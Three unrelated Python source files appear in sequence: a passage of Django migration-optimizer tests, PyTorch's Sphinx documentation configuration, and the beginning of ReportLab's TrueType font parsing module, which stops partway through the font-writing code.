CreateModel should absorb RenameModels.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RenameModel("Foo", "Bar"),
],
[
migrations.CreateModel(
"Bar",
[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
)
],
)
def test_rename_model_self(self):
"""
RenameModels should absorb themselves.
"""
self.assertOptimizesTo(
[
migrations.RenameModel("Foo", "Baa"),
migrations.RenameModel("Baa", "Bar"),
],
[
migrations.RenameModel("Foo", "Bar"),
],
)
def test_create_alter_model_options(self):
self.assertOptimizesTo(
[
migrations.CreateModel('Foo', fields=[]),
migrations.AlterModelOptions(name='Foo', options={'verbose_name_plural': 'Foozes'}),
],
[
migrations.CreateModel('Foo', fields=[], options={'verbose_name_plural': 'Foozes'}),
]
)
def _test_create_alter_foo_delete_model(self, alter_foo):
"""
CreateModel, AlterModelTable, AlterUniqueTogether/AlterIndexTogether/
AlterOrderWithRespectTo, and DeleteModel should collapse into nothing.
"""
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.AlterModelTable("Foo", "woohoo"),
alter_foo,
migrations.DeleteModel("Foo"),
],
[],
)
def test_create_alter_unique_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterUniqueTogether("Foo", [["a", "b"]]))
def test_create_alter_index_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterIndexTogether("Foo", [["a", "b"]]))
def test_create_alter_owrt_delete_model(self):
self._test_create_alter_foo_delete_model(migrations.AlterOrderWithRespectTo("Foo", "a"))
def _test_alter_alter_model(self, alter_foo, alter_bar):
"""
Two AlterUniqueTogether/AlterIndexTogether/AlterOrderWithRespectTo
should collapse into the second.
"""
self.assertOptimizesTo(
[
alter_foo,
alter_bar,
],
[
alter_bar,
],
)
def test_alter_alter_table_model(self):
self._test_alter_alter_model(
migrations.AlterModelTable("Foo", "a"),
migrations.AlterModelTable("Foo", "b"),
)
def test_alter_alter_unique_model(self):
self._test_alter_alter_model(
migrations.AlterUniqueTogether("Foo", [["a", "b"]]),
migrations.AlterUniqueTogether("Foo", [["a", "c"]]),
)
def test_alter_alter_index_model(self):
self._test_alter_alter_model(
migrations.AlterIndexTogether("Foo", [["a", "b"]]),
migrations.AlterIndexTogether("Foo", [["a", "c"]]),
)
def test_alter_alter_owrt_model(self):
self._test_alter_alter_model(
migrations.AlterOrderWithRespectTo("Foo", "a"),
migrations.AlterOrderWithRespectTo("Foo", "b"),
)
def test_optimize_through_create(self):
"""
We should be able to optimize away create/delete through a create or delete
of a different model, but only if the create operation does not mention the model
at all.
"""
# These should work
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Bar"),
migrations.DeleteModel("Foo"),
],
[],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.DeleteModel("Foo"),
migrations.DeleteModel("Bar"),
],
[],
)
# This should not work - FK should block it
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
)
# The same operations should be optimized if app_label is specified and
# a FK references a model from the other app.
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
],
app_label="otherapp",
)
# But it shouldn't work if a FK references a model with the same
# app_label.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("other", models.ForeignKey("testapp.Foo", models.CASCADE))]),
migrations.DeleteModel("Foo"),
],
app_label="testapp",
)
# This should not work - bases should block it
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
)
# The same operations should be optimized if app_label and none of
# bases belong to that app.
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
[
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
],
app_label="otherapp",
)
# But it shouldn't work if some of bases belongs to the specified app.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())], bases=("testapp.Foo",)),
migrations.DeleteModel("Foo"),
],
app_label="testapp",
)
def test_create_model_add_field(self):
"""
AddField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.AddField("Foo", "age", models.IntegerField()),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
("age", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_create_model_add_field_not_through_fk(self):
"""
AddField should NOT optimize into CreateModel if it's an FK to a model
that's between them.
"""
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Link", [("url", models.TextField())]),
migrations.AddField("Foo", "link", models.ForeignKey("migrations.Link", models.CASCADE)),
],
)
def test_create_model_add_field_not_through_m2m_through(self):
"""
AddField should NOT optimize into CreateModel if it's an M2M using a
through that's created between them.
"""
# Note: The middle model is not actually a valid through model,
# but that doesn't matter, as we never render it.
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("LinkThrough", []),
migrations.AddField(
"Foo", "link", models.ManyToManyField("migrations.Link", through="migrations.LinkThrough")
),
],
)
def test_create_model_alter_field(self):
"""
AlterField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.AlterField("Foo", "name", models.IntegerField()),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_create_model_rename_field(self):
"""
RenameField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[("name", models.CharField(max_length=255))],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RenameField("Foo", "name", "title"),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("title", models.CharField(max_length=255)),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_add_field_rename_field(self):
"""
RenameField should optimize into AddField
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "name", models.CharField(max_length=255)),
migrations.RenameField("Foo", "name", "title"),
],
[
migrations.AddField("Foo", "title", models.CharField(max_length=255)),
],
)
def test_alter_field_rename_field(self):
"""
RenameField should optimize to the other side of AlterField,
and into itself.
"""
self.assertOptimizesTo(
[
migrations.AlterField("Foo", "name", models.CharField(max_length=255)),
migrations.RenameField("Foo", "name", "title"),
migrations.RenameField("Foo", "title", "nom"),
],
[
migrations.RenameField("Foo", "name", "nom"),
migrations.AlterField("Foo", "nom", models.CharField(max_length=255)),
],
)
def test_create_model_remove_field(self):
"""
RemoveField should optimize into CreateModel.
"""
managers = [('objects', EmptyManager())]
self.assertOptimizesTo(
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
("age", models.IntegerField()),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
migrations.RemoveField("Foo", "age"),
],
[
migrations.CreateModel(
name="Foo",
fields=[
("name", models.CharField(max_length=255)),
],
options={'verbose_name': 'Foo'},
bases=(UnicodeModel,),
managers=managers,
),
],
)
def test_add_field_alter_field(self):
"""
AlterField should optimize into AddField.
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "age", models.IntegerField()),
migrations.AlterField("Foo", "age", models.FloatField(default=2.4)),
],
[
migrations.AddField("Foo", name="age", field=models.FloatField(default=2.4)),
],
)
def test_add_field_delete_field(self):
"""
RemoveField should cancel AddField
"""
self.assertOptimizesTo(
[
migrations.AddField("Foo", "age", models.IntegerField()),
migrations.RemoveField("Foo", "age"),
],
[],
)
def test_alter_field_delete_field(self):
"""
RemoveField should absorb AlterField
"""
self.assertOptimizesTo(
[
migrations.AlterField("Foo", "age", models.IntegerField()),
migrations.RemoveField("Foo", "age"),
],
[
migrations.RemoveField("Foo", "age"),
],
)
def _test_create_alter_foo_field(self, alter):
"""
CreateModel, AlterFooTogether/AlterOrderWithRespectTo followed by an
add/alter/rename field should optimize to CreateModel and the Alter*
"""
# AddField
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.AddField("Foo", "c", models.IntegerField()),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
],
)
# AlterField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.AlterField("Foo", "b", models.CharField(max_length=255)),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.AlterField("Foo", "c", models.CharField(max_length=255)),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.CharField(max_length=255)),
]),
alter,
],
)
# RenameField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "c"),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "x"),
migrations.RenameField("Foo", "x", "c"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "b", "c"),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "c", "d"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("d", models.IntegerField()),
]),
alter,
],
)
# RemoveField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RemoveField("Foo", "b"),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.RemoveField("Foo", "c"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
],
)
def test_create_alter_unique_field(self):
self._test_create_alter_foo_field(migrations.AlterUniqueTogether("Foo", [["a", "b"]]))
def test_create_alter_index_field(self):
self._test_create_alter_foo_field(migrations.AlterIndexTogether("Foo", [["a", "b"]]))
def test_create_alter_owrt_field(self):
self._test_create_alter_foo_field(migrations.AlterOrderWithRespectTo("Foo", "b"))
def test_optimize_through_fields(self):
"""
field-level through checking is working. This should manage to collapse
model Foo to nonexistence, and model Bar to a single IntegerField
called "width".
"""
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
migrations.AddField("Foo", "age", models.IntegerField()),
migrations.AddField("Bar", "width", models.IntegerField()),
migrations.AlterField("Foo", "age", models.IntegerField()),
migrations.RenameField("Bar", "size", "dimensions"),
migrations.RemoveField("Foo", "age"),
migrations.RenameModel("Foo", "Phou"),
migrations.RemoveField("Bar", "dimensions"),
migrations.RenameModel("Phou", "Fou"),
migrations.DeleteModel("Fou"),
],
[
migrations.CreateModel("Bar", [("width", models.IntegerField())]),
],
)
def test_optimize_elidable_operation(self):
elidable_operation = operations.base.Operation()
elidable_operation.elidable = True
self.assertOptimizesTo(
[
elidable_operation,
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
elidable_operation,
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
elidable_operation,
migrations.RenameModel("Foo", "Phou"),
migrations.DeleteModel("Bar"),
elidable_operation,
],
[
migrations.CreateModel("Phou", [("name", models.CharField(max_length=255))]),
],
)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# PyTorch documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 23 13:31:47 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import torch
try:
import torchvision
except ImportError:
import warnings
warnings.warn('unable to load "torchvision" package')
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode',
]
napoleon_use_ivar = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PyTorch'
copyright = '2017, Torch Contributors'
author = 'Torch Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# TODO: change to [:2] at v1.0
version = '.'.join(torch.__version__.split('+')[0].split('.')[:3])
# The full version, including alpha/beta/rc tags.
# TODO: verify this works as expected
release = torch.__version__.split('+')[0]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'collapse_navigation': False,
'display_version': False,
'logo_only': True,
}
html_logo = '_static/img/pytorch-logo-dark.svg'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# html_style_path = 'css/pytorch_theme.css'
html_context = {
'css_files': [
'https://fonts.googleapis.com/css?family=Lato',
'_static/css/pytorch_theme.css'
],
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyTorchdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pytorch.tex', 'PyTorch Documentation',
'Torch Contributors', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'PyTorch', 'PyTorch Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PyTorch', 'PyTorch Documentation',
author, 'PyTorch', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
}
# -- A patch that prevents Sphinx from cross-referencing ivar tags -------
# See http://stackoverflow.com/a/41184353/3343043
from docutils import nodes
from sphinx.util.docfields import TypedField
from sphinx import addnodes
def patched_make_field(self, types, domain, items):
# type: (List, unicode, Tuple) -> nodes.field
def handle_item(fieldarg, content):
par = nodes.paragraph()
par += addnodes.literal_strong('', fieldarg) # Patch: this line added
# par.extend(self.make_xrefs(self.rolename, domain, fieldarg,
# addnodes.literal_strong))
if fieldarg in types:
par += nodes.Text(' (')
# NOTE: using .pop() here to prevent a single type node to be
# inserted twice into the doctree, which leads to
# inconsistencies later when references are resolved
fieldtype = types.pop(fieldarg)
if len(fieldtype) == 1 and isinstance(fieldtype[0], nodes.Text):
typename = u''.join(n.astext() for n in fieldtype)
typename = typename.replace('int', 'python:int')
typename = typename.replace('long', 'python:long')
typename = typename.replace('float', 'python:float')
typename = typename.replace('type', 'python:type')
par.extend(self.make_xrefs(self.typerolename, domain, typename,
addnodes.literal_emphasis))
else:
par += fieldtype
par += nodes.Text(')')
par += nodes.Text(' -- ')
par += content
return par
fieldname = nodes.field_name('', self.label)
if len(items) == 1 and self.can_collapse:
fieldarg, content = items[0]
bodynode = handle_item(fieldarg, content)
else:
bodynode = self.list_type()
for fieldarg, content in items:
bodynode += nodes.list_item('', handle_item(fieldarg, content))
fieldbody = nodes.field_body('', bodynode)
return nodes.field('', fieldname, fieldbody)
TypedField.make_field = patched_make_field
| |
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
__version__ = '$Id: ttfonts.py 3959 2012-09-27 14:39:39Z robin $'
__doc__="""TrueType font support
This defines classes to represent TrueType fonts. They know how to calculate
their own width and how to write themselves into PDF files. They support
subsetting and embedding and can represent all 16-bit Unicode characters.
Note on dynamic fonts
---------------------
Usually a Font in ReportLab corresponds to a fixed set of PDF objects (Font,
FontDescriptor, Encoding). But with dynamic font subsetting a single TTFont
will result in a number of Font/FontDescriptor/Encoding object sets, and the
contents of those will depend on the actual characters used for printing.
To support dynamic font subsetting a concept of "dynamic font" was introduced.
Dynamic Fonts have a _dynamicFont attribute set to 1.
Dynamic fonts have the following additional functions::
def splitString(self, text, doc):
'''Splits text into a number of chunks, each of which belongs to a
single subset. Returns a list of tuples (subset, string). Use
subset numbers with getSubsetInternalName. Doc is used to identify
a document so that different documents may have different dynamically
constructed subsets.'''
def getSubsetInternalName(self, subset, doc):
'''Returns the name of a PDF Font object corresponding to a given
subset of this dynamic font. Use this function instead of
PDFDocument.getInternalFontName.'''
You must never call PDFDocument.getInternalFontName for dynamic fonts.
If you have a traditional static font, mapping to PDF text output operators
is simple::
'%s 14 Tf (%s) Tj' % (getInternalFontName(psfontname), text)
If you have a dynamic font, use this instead::
for subset, chunk in font.splitString(text, doc):
'%s 14 Tf (%s) Tj' % (font.getSubsetInternalName(subset, doc), chunk)
(Tf is a font setting operator and Tj is a text ouput operator. You should
also escape invalid characters in Tj argument, see TextObject._formatText.
Oh, and that 14 up there is font size.)
Canvas and TextObject have special support for dynamic fonts.
"""
import string
from struct import pack, unpack, error as structError
from reportlab.lib.utils import getStringIO
from reportlab.pdfbase import pdfmetrics, pdfdoc
from reportlab import rl_config
class TTFError(pdfdoc.PDFError):
"TrueType font exception"
pass
def SUBSETN(n,table=string.maketrans('0123456789','ABCDEFGHIJ')):
return ('%6.6d'%n).translate(table)
#
# Helpers
#
from codecs import utf_8_encode, utf_8_decode, latin_1_decode
parse_utf8=lambda x, decode=utf_8_decode: map(ord,decode(x)[0])
parse_latin1 = lambda x, decode=latin_1_decode: map(ord,decode(x)[0])
def latin1_to_utf8(text):
"helper to convert when needed from latin input"
return utf_8_encode(latin_1_decode(text)[0])[0]
def makeToUnicodeCMap(fontname, subset):
"""Creates a ToUnicode CMap for a given subset. See Adobe
_PDF_Reference (ISBN 0-201-75839-3) for more information."""
cmap = [
"/CIDInit /ProcSet findresource begin",
"12 dict begin",
"begincmap",
"/CIDSystemInfo",
"<< /Registry (%s)" % fontname,
"/Ordering (%s)" % fontname,
"/Supplement 0",
">> def",
"/CMapName /%s def" % fontname,
"/CMapType 2 def",
"1 begincodespacerange",
"<00> <%02X>" % (len(subset) - 1),
"endcodespacerange",
"%d beginbfchar" % len(subset)
] + ["<%02X> <%04X>" % (i,v) for i,v in enumerate(subset)] + [
"endbfchar",
"endcmap",
"CMapName currentdict /CMap defineresource pop",
"end",
"end"
]
return string.join(cmap, "\n")
def splice(stream, offset, value):
"""Splices the given value into stream at the given offset and
returns the resulting stream (the original is unchanged)"""
return stream[:offset] + value + stream[offset + len(value):]
def _set_ushort(stream, offset, value):
"""Writes the given unsigned short value into stream at the given
offset and returns the resulting stream (the original is unchanged)"""
return splice(stream, offset, pack(">H", value))
try:
import _rl_accel
except ImportError:
try:
from reportlab.lib import _rl_accel
except ImportError:
_rl_accel = None
try:
hex32 = _rl_accel.hex32
except:
def hex32(i):
return '0X%8.8X' % (long(i)&0xFFFFFFFFL)
try:
add32 = _rl_accel.add32L
calcChecksum = _rl_accel.calcChecksumL
except:
def add32(x, y):
"Calculate (x + y) modulo 2**32"
return (x+y) & 0xFFFFFFFFL
def calcChecksum(data):
"""Calculates TTF-style checksums"""
if len(data)&3: data = data + (4-(len(data)&3))*"\0"
return sum(unpack(">%dl" % (len(data)>>2), data)) & 0xFFFFFFFFL
del _rl_accel
#
# TrueType font handling
#
GF_ARG_1_AND_2_ARE_WORDS = 1 << 0
GF_ARGS_ARE_XY_VALUES = 1 << 1
GF_ROUND_XY_TO_GRID = 1 << 2
GF_WE_HAVE_A_SCALE = 1 << 3
GF_RESERVED = 1 << 4
GF_MORE_COMPONENTS = 1 << 5
GF_WE_HAVE_AN_X_AND_Y_SCALE = 1 << 6
GF_WE_HAVE_A_TWO_BY_TWO = 1 << 7
GF_WE_HAVE_INSTRUCTIONS = 1 << 8
GF_USE_MY_METRICS = 1 << 9
GF_OVERLAP_COMPOUND = 1 << 10
GF_SCALED_COMPONENT_OFFSET = 1 << 11
GF_UNSCALED_COMPONENT_OFFSET = 1 << 12
def TTFOpenFile(fn):
'''Opens a TTF file possibly after searching TTFSearchPath
returns (filename,file)
'''
from reportlab.lib.utils import rl_isfile, open_for_read
try:
f = open_for_read(fn,'rb')
return fn, f
except IOError:
import os
if not os.path.isabs(fn):
for D in rl_config.TTFSearchPath:
tfn = os.path.join(D,fn)
if rl_isfile(tfn):
f = open_for_read(tfn,'rb')
return tfn, f
raise TTFError('Can\'t open file "%s"' % fn)
class TTFontParser:
"Basic TTF file parser"
ttfVersions = (0x00010000,0x74727565,0x74746366)
ttcVersions = (0x00010000,0x00020000)
fileKind='TTF'
def __init__(self, file, validate=0,subfontIndex=0):
"""Loads and parses a TrueType font file. file can be a filename or a
file object. If validate is set to a false values, skips checksum
validation. This can save time, especially if the font is large.
"""
self.validate = validate
self.readFile(file)
isCollection = self.readHeader()
if isCollection:
self.readTTCHeader()
self.getSubfont(subfontIndex)
else:
if self.validate: self.checksumFile()
self.readTableDirectory()
self.subfontNameX = ''
def readTTCHeader(self):
self.ttcVersion = self.read_ulong()
self.fileKind = 'TTC'
self.ttfVersions = self.ttfVersions[:-1]
if self.ttcVersion not in self.ttcVersions:
raise TTFError('"%s" is not a %s file: can\'t read version 0x%8.8x' %(self.filename,self.fileKind,self.ttcVersion))
self.numSubfonts = self.read_ulong()
self.subfontOffsets = []
a = self.subfontOffsets.append
for i in xrange(self.numSubfonts):
a(self.read_ulong())
def getSubfont(self,subfontIndex):
if self.fileKind!='TTC':
raise TTFError('"%s" is not a TTC file: use this method' % (self.filename,self.fileKind))
try:
pos = self.subfontOffsets[subfontIndex]
except IndexError:
raise TTFError('TTC file "%s": bad subfontIndex %s not in [0,%d]' % (self.filename,subfontIndex,self.numSubfonts-1))
self.seek(pos)
self.readHeader()
self.readTableDirectory()
self.subfontNameX = '-'+str(subfontIndex)
def readTableDirectory(self):
try:
self.numTables = self.read_ushort()
self.searchRange = self.read_ushort()
self.entrySelector = self.read_ushort()
self.rangeShift = self.read_ushort()
# Read table directory
self.table = {}
self.tables = []
for n in xrange(self.numTables):
record = {}
record['tag'] = self.read_tag()
record['checksum'] = self.read_ulong()
record['offset'] = self.read_ulong()
record['length'] = self.read_ulong()
self.tables.append(record)
self.table[record['tag']] = record
except:
raise TTFError('Corrupt %s file "%s" cannot read Table Directory' % (self.fileKind, self.filename))
if self.validate: self.checksumTables()
def readHeader(self):
'''read the sfnt header at the current position'''
try:
self.version = version = self.read_ulong()
except:
raise TTFError('"%s" is not a %s file: can\'t read version' %(self.filename,self.fileKind))
if version==0x4F54544F:
raise TTFError('%s file "%s": postscript outlines are not supported'%(self.fileKind,self.filename))
if version not in self.ttfVersions:
raise TTFError('Not a TrueType font: version=0x%8.8X' % version)
return version==self.ttfVersions[-1]
def readFile(self,f):
if hasattr(f,'read'):
self.filename = '(ttf)'
else:
self.filename, f = TTFOpenFile(f)
self._ttf_data = f.read()
self._pos = 0
def checksumTables(self):
# Check the checksums for all tables
for t in self.tables:
table = self.get_chunk(t['offset'], t['length'])
checksum = calcChecksum(table)
if t['tag'] == 'head':
adjustment = unpack('>l', table[8:8+4])[0]
checksum = add32(checksum, -adjustment)
xchecksum = t['checksum']
if xchecksum != checksum:
raise TTFError('TTF file "%s": invalid checksum %s table: %s (expected %s)' % (self.filename,hex32(checksum),t['tag'],hex32(xchecksum)))
def checksumFile(self):
# Check the checksums for the whole file
checksum = calcChecksum(self._ttf_data)
if 0xB1B0AFBAL!=checksum:
raise TTFError('TTF file "%s": invalid checksum %s (expected 0xB1B0AFBA) len: %d &3: %d' % (self.filename,hex32(checksum),len(self._ttf_data),(len(self._ttf_data)&3)))
def get_table_pos(self, tag):
"Returns the offset and size of a given TTF table."
offset = self.table[tag]['offset']
length = self.table[tag]['length']
return (offset, length)
def seek(self, pos):
"Moves read pointer to a given offset in file."
self._pos = pos
def skip(self, delta):
"Skip the given number of bytes."
self._pos = self._pos + delta
def seek_table(self, tag, offset_in_table = 0):
"""Moves read pointer to the given offset within a given table and
returns absolute offset of that position in the file."""
self._pos = self.get_table_pos(tag)[0] + offset_in_table
return self._pos
def read_tag(self):
"Read a 4-character tag"
self._pos += 4
return self._ttf_data[self._pos - 4:self._pos]
def read_ushort(self):
"Reads an unsigned short"
self._pos += 2
return unpack('>H',self._ttf_data[self._pos-2:self._pos])[0]
def read_ulong(self):
"Reads an unsigned long"
self._pos += 4
return unpack('>L',self._ttf_data[self._pos - 4:self._pos])[0]
def read_short(self):
"Reads a signed short"
self._pos += 2
try:
return unpack('>h',self._ttf_data[self._pos-2:self._pos])[0]
except structError, error:
raise TTFError, error
def get_ushort(self, pos):
"Return an unsigned short at given position"
return unpack('>H',self._ttf_data[pos:pos+2])[0]
def get_ulong(self, pos):
"Return an unsigned long at given position"
return unpack('>L',self._ttf_data[pos:pos+4])[0]
def get_chunk(self, pos, length):
"Return a chunk of raw data at given position"
return self._ttf_data[pos:pos+length]
def get_table(self, tag):
"Return the given TTF table"
pos, length = self.get_table_pos(tag)
return self._ttf_data[pos:pos+length]
class TTFontMaker:
"Basic TTF file generator"
def __init__(self):
"Initializes the generator."
self.tables = {}
def add(self, tag, data):
"Adds a table to the TTF file."
if tag == 'head':
data = splice(data, 8, '\0\0\0\0')
self.tables[tag] = data
def makeStream(self):
"Finishes the generation and returns the TTF file as a string"
stm = getStringIO()
write = stm.write
numTables = len(self.tables)
searchRange = 1
entrySelector = 0
while searchRange * 2 <= numTables:
searchRange = searchRange * 2
entrySelector = entrySelector + 1
searchRange = searchRange * 16
rangeShift = numTables * 16 - searchRange
# Header
